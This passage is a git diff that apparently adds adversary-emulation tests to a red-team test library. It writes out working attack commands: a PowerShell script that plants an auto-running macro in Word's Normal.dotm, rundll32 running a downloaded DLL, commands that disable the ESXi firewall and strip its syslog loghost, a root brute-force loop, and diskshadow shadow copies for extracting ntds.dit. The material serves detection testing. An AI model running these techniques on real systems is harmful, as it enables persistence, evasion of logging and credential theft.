2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29414,6 +29414,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index f2b3f060a2..00c4225656 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -684,6 +684,35 @@ defense-evasion: copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr cleanup_command: del not_an_scr.scr + - name: Running DLL with .init extension and function + auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 + description: | + This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. + DLL created with the AtomicTestHarnesses Portable Executable Builder script. + supported_platforms: + - windows + input_arguments: + dll_file: + description: The DLL file to be called + type: string + default: PathToAtomicsFolder\T1218.011\bin\_WT.init + dll_url: + description: The URL to the DLL file that must be downloaded + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init + dependency_executor_name: powershell + dependencies: + - description: The DLL file to be called must exist at the specified location + (#{dll_file}) + prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" + executor: + command: 'rundll32.exe #{dll_file},krnl + + ' + name: command_prompt T1027.009: technique: modified: '2023-09-29T21:14:57.263Z' @@ -8589,6 +8618,48 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a + description: 'Adversaries may disable the ESXI firewall via ESXCLI + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m + PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n" + cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} + -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n" + name: command_prompt + elevation_required: false T1553.003: technique: x_mitre_platforms: @@ -50264,7 +50335,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -50316,7 +50387,104 @@ persistence: x_mitre_permissions_required: - User - Administrator - atomic_tests: [] + identifier: T1137.001 + atomic_tests: + - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via + PowerShell + auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8 + description: 'Injects a Macro in the Word default template "Normal.dotm" and + makes it execute each time that Word is opened. In this test, the Macro creates + a sheduled task to open Calc.exe every evening. + + ' + supported_platforms: + - windows + dependencies: + - description: 'Microsoft Word must be installed + + ' + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + + ' + executor: + name: powershell + elevation_required: true + command: "# Registry setting to \"Trust access to the VBA project object model\" + in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file + will be created if Registry setting did not already exist or if it was set + to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey + -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical + operation to: if the value of the key/value is 1, do nothing - \n# if the + value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create + the value and flag2\nif ($value -eq \"1\") \n{\n Write-Host \"The registry + value '$registryValue' already exists with the required setting.\"\n} \n + \ elseif ($value -eq \"0\") \n{\n Write-Host \"The registry value was set + to 0, temporarily changing to 1.\"\n New-ItemProperty -Path $registryKey + -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n + \ echo \"flag1\" > $flagPath1\n} \n else \n{\n Write-Host \"The registry + value '$registryValue' does not exist, temporarily creating it.\"\n New-ItemProperty + -Path $registryKey -Name $registryValue -Value $registryData -PropertyType + DWORD -Force | Out-Null\n echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName + Microsoft.Office.Interop.Word\n# Define the path of copied normal template + for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination + $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a + scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n + \ Sub AutoExec()\n Dim applicationPath As String\n Dim taskName As String\n + \ Dim runTime As String\n Dim schTasksCmd As String\n applicationPath + = \"C:\\Windows\\System32\\calc.exe\"\n taskName = \"OpenCalcTask\"\n runTime + = \"20:04\"\n schTasksCmd = \"schtasks /create /tn \"\"\" & taskName & + \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime + & \" /f\"\n Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n End Sub\n\"@\n# + Create a new instance of Word.Application\n$word = New-Object -ComObject + Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n# + Open the document\n$document = $word.Documents.Open($docPath)\n# Access + the VBA project of the document\n$vbaProject = $document.VBProject\n# Add + a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1) + # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n# + Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n# + Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) + | Out-Null\n" + cleanup_command: "# Registry setting to \"Trust access to the VBA project + object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines + the path each flag file created depending on the original registry state\n$flagPath1 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\" + /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif + (Test-Path $copyPath)\n{\n #Delete the injected template\n Remove-Item + -Force $docPath -ErrorAction SilentlyContinue\n # Restore the original + template\n Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction + SilentlyContinue\n Write-Host \"The original template has been restored\"\n}\n + \ else\n{\n Write-Host \"The original template is present\"\n}\n#Restore + the original state of the registry key\nif (Test-Path $flagPath1) \n{\n + \ # The value was originally 0, set back to 0\n New-ItemProperty -Path + $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD + -Force | Out-Null\n Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n + \ Write-Host \"The original registry state has been restored\"\n} \n elseif + (Test-Path $flagPath2)\n{\n #The value did not previously exist, delete + the value\n Remove-ItemProperty -Path $registryKey -Name $registryValue + | Out-Null\n Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue + | Out-Null\n Write-Host \"The original registry state has been restored\"\n}\n + \ else \n{\n # The value was already 1, do nothing\n Write-Host \"The + value $registryValue already existed in $registryKey.\"\n}\n" T1546.009: technique: x_mitre_platforms: @@ -61327,6 +61495,65 @@ collection: >nul 2>&1 ' + - name: ESXi - Remove Syslog remote IP + auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2 + description: 'An adversary may edit the syslog config to remove the loghost + in order to prevent or redirect logs being received by SIEM. + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: Username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "# Extract line with IP address from the syslog configuration output\n#{plink_file} + -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt + | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n# + Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username} + -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n# + Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath + = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath + -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n Write-Host + \"The content is $fileContent\"\n Write-Host \"The file is empty\"\n} + else {\n # Use a regular expression to extract IP addresses\n $ipAddresses + = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n + \ \n $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n + \ $output | Out-File -FilePath $outputFilePath -Encoding ascii\n \n + \ Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n" + cleanup_command: | + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt + name: powershell + elevation_required: true T1113: technique: modified: '2023-03-30T21:01:39.967Z' @@ -67129,6 +67356,46 @@ credential-access: command: "cd \"PathToAtomicsFolder\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n" + - name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 + description: | + An adversary may attempt to brute force the password of privilleged account for privilege escalation. + In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + lockout_threshold: + description: Specify the account lockout threshold configured on the ESXI + management server + type: string + default: '5' + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } + name: powershell + elevation_required: false T1003: technique: x_mitre_platforms: @@ -74370,6 +74637,24 @@ credential-access: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + - name: Create Volume Shadow Copy with diskshadow + auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7 + description: | + This test is intended to be run on a domain controller + An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the script + type: Path + default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt + executor: + command: | + mkdir c:\exfil + diskshadow.exe /s #{filename} + name: command_prompt + elevation_required: true T1558.003: technique: modified: '2023-03-30T21:01:46.538Z' diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index 3c27055a35..62ad42f085 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,6 +30,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th - [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy) +- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow) +
@@ -425,4 +427,39 @@ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 +
+
+ +## Atomic Test #9 - Create Volume Shadow Copy with diskshadow +This test is intended to be run on a domain controller +An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + +**Supported Platforms:** Windows + + +**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | Location of the script | Path | PathToAtomicsFolder\T1003.003\src\diskshadow.txt| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +mkdir c:\exfil +diskshadow.exe /s #{filename} +``` + + + + + +
diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 2f047046ec..c66d2dabd8 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -40,7 +40,8 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #7 - SUDO Brute Force - FreeBSD](#atomic-test-7---sudo-brute-force---freebsd) -- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi-brute-force-until-account-lockout) +- [Atomic Test #8 - ESXi - Brute Force Until Account Lockout](#atomic-test-8---esxi---brute-force-until-account-lockout) +
@@ -437,11 +438,11 @@ pkg update && pkg install -y sudo curl bash ## Atomic Test #8 - ESXi - Brute Force Until Account Lockout An adversary may attempt to brute force the password of privilleged account for privilege escalation. In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) - + **Supported Platforms:** Windows -**auto_generated_guid:** f0b443ae-9565-11ee-b9d1-0242ac120002 +**auto_generated_guid:** ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 @@ -450,30 +451,37 @@ In the process, the TA may lock the account, which can be used for detection. [R #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vm_host | Name or IP of the ESXI host | string | atomic.local | -| plink_file | Path to Putty | path | 'PathToAtomicsFolder\..\atomics\T1110.001\bin\plink.exe' | -| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5 | +| vm_host | Specify the host name of the ESXi Server | string | atomic.local| +| plink_file | Path to Putty | path | PathToAtomicsFolder\..\ExternalPayloads\plink.exe| +| lockout_threshold | Specify the account lockout threshold configured on the ESXI management server | string | 5| -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `powershell`! ```powershell - $lockout_threshold = [int]"#{lockout_threshold}" - for ($var = 1; $var -le $lockout_threshold; $var++) { - #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 - } +$lockout_threshold = [int]"#{lockout_threshold}" +for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } ``` + + + #### Dependencies: Run with `powershell`! -##### Description: Check if plink is available. +##### Description: The plink executable must be found in the ExternalPayloads folder. ##### Check Prereq Commands: ```powershell if (Test-Path "#{plink_file}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell - Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null +Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" ``` -
\ No newline at end of file + + + +
diff --git a/atomics/T1137.001/T1137.001.md b/atomics/T1137.001/T1137.001.md new file mode 100644 index 0000000000..b79376b990 --- /dev/null +++ b/atomics/T1137.001/T1137.001.md @@ -0,0 +1,188 @@ +# T1137.001 - Office Application Startup: Office Template Macros. +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/001) +
Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template) + +Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) + +Word Normal.dotm location:
+C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm + +Excel Personal.xlsb location:
+C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB + +Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\Program Files (x86)\Microsoft Office\root\Office16\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) + +An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.
+ +## Atomic Tests + +- [Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell](#atomic-test-1---injecting-a-macro-into-the-word-normaldotm-template-for-persistence-via-powershell) + + +
+ +## Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell +Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 940db09e-80b6-4dd0-8d4d-7764f89b47a8 + + + + + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +# Registry setting to "Trust access to the VBA project object model" in Word +$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" +$registryValue = "AccessVBOM" +$registryData = "1" +# The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0 +$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" +$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" +# Get the value of the Key/Value pair +$value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue +# Logical operation to: if the value of the key/value is 1, do nothing - +# if the value is 0, change it to 1 and create flag1 - +# if it doesn't exist, create the value and flag2 +if ($value -eq "1") +{ + Write-Host "The registry value '$registryValue' already exists with the required setting." +} + elseif ($value -eq "0") +{ + Write-Host "The registry value was set to 0, temporarily changing to 1." + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag1" > $flagPath1 +} + else +{ + Write-Host "The registry value '$registryValue' does not exist, temporarily creating it." + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null + echo "flag2" > $flagPath2 +} +Add-Type -AssemblyName Microsoft.Office.Interop.Word +# Define the path of copied normal template for restoral +$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" +# Define the path to the normal template +$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" +# Create copy of orginal template for restoral +Copy-Item -Path $docPath -Destination $copyPath -Force +# VBA code to be insterted as a Macro +# Will create a scheduled task to open the Calculator at 8:04pm daily +$vbaCode = @" + Sub AutoExec() + Dim applicationPath As String + Dim taskName As String + Dim runTime As String + Dim schTasksCmd As String + applicationPath = "C:\Windows\System32\calc.exe" + taskName = "OpenCalcTask" + runTime = "20:04" + schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f" + Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus + End Sub +"@ +# Create a new instance of Word.Application +$word = New-Object -ComObject Word.Application +# Keep the Word application hidden +$word.Visible = $false +# Open the document +$document = $word.Documents.Open($docPath) +# Access the VBA project of the document +$vbaProject = $document.VBProject +# Add a new module to the VBA project +$newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule +# Add the VBA code to the new module +$newModule.CodeModule.AddFromString($vbaCode) +# Run the Macro +$word.run("AutoExec") +# Save and close the document +$document.SaveAs($docPath) +$document.Close() +# Quit Word +$word.Quit() +# Release COM objects +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null +[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null +``` + +#### Cleanup Commands: +```powershell +# Registry setting to "Trust access to the VBA project object model" in Word +$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security" +$registryValue = "AccessVBOM" +$registryData1 = "1" +$registryData0 = "0" +# Defines the path each flag file created depending on the original registry state +$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt" +$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt" +# Define the path of copied normal template for restoral +$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm" +# Define the path to the normal template +$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm" +# Delete the scheduled task created by the Macro +schtasks /Delete /TN "OpenCalcTask" /F | Out-Null +#Restore the orginal template if the backup copy exists +if (Test-Path $copyPath) +{ + #Delete the injected template + Remove-Item -Force $docPath -ErrorAction SilentlyContinue + # Restore the original template + Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue + Write-Host "The original template has been restored" +} + else +{ + Write-Host "The original template is present" +} +#Restore the original state of the registry key +if (Test-Path $flagPath1) +{ + # The value was originally 0, set back to 0 + New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null + Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue + Write-Host "The original registry state has been restored" +} + elseif (Test-Path $flagPath2) +{ + #The value did not previously exist, delete the value + Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null + Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null + Write-Host "The original registry state has been restored" +} + else +{ + # The value was already 1, do nothing + Write-Host "The value $registryValue already existed in $registryKey." +} +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft Word must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word manually to meet this requirement" +``` + + + + +
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 99d236c7c2..416e9b73d5 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -38,6 +38,8 @@ Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techni - [Atomic Test #13 - Rundll32 with desk.cpl](#atomic-test-13---rundll32-with-deskcpl) +- [Atomic Test #14 - Running DLL with .init extension and function](#atomic-test-14---running-dll-with-init-extension-and-function) +
@@ -590,4 +592,52 @@ del not_an_scr.scr +
+
+ +## Atomic Test #14 - Running DLL with .init extension and function +This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. +DLL created with the AtomicTestHarnesses Portable Executable Builder script. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 2d5029f0-ae20-446f-8811-e7511b58e8b6 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| dll_file | The DLL file to be called | string | PathToAtomicsFolder\T1218.011\bin\_WT.init| +| dll_url | The URL to the DLL file that must be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +rundll32.exe #{dll_file},krnl +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The DLL file to be called must exist at the specified location (#{dll_file}) +##### Check Prereq Commands: +```powershell +if (Test-Path "#{dll_file}") {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null +Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" +``` + + + +
diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 67ad62df49..1296d23a91 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -28,7 +28,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi - [Atomic Test #9 - Encrypts collected data with AES-256 and Base64](#atomic-test-9---encrypts-collected-data-with-aes-256-and-base64) -- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi-remove-syslog-remote-ip) +- [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi---remove-syslog-remote-ip) +
@@ -506,12 +507,12 @@ if [ ! -d #{input_folder} ]; then mkdir -p #{input_folder}; cd #{input_folder};
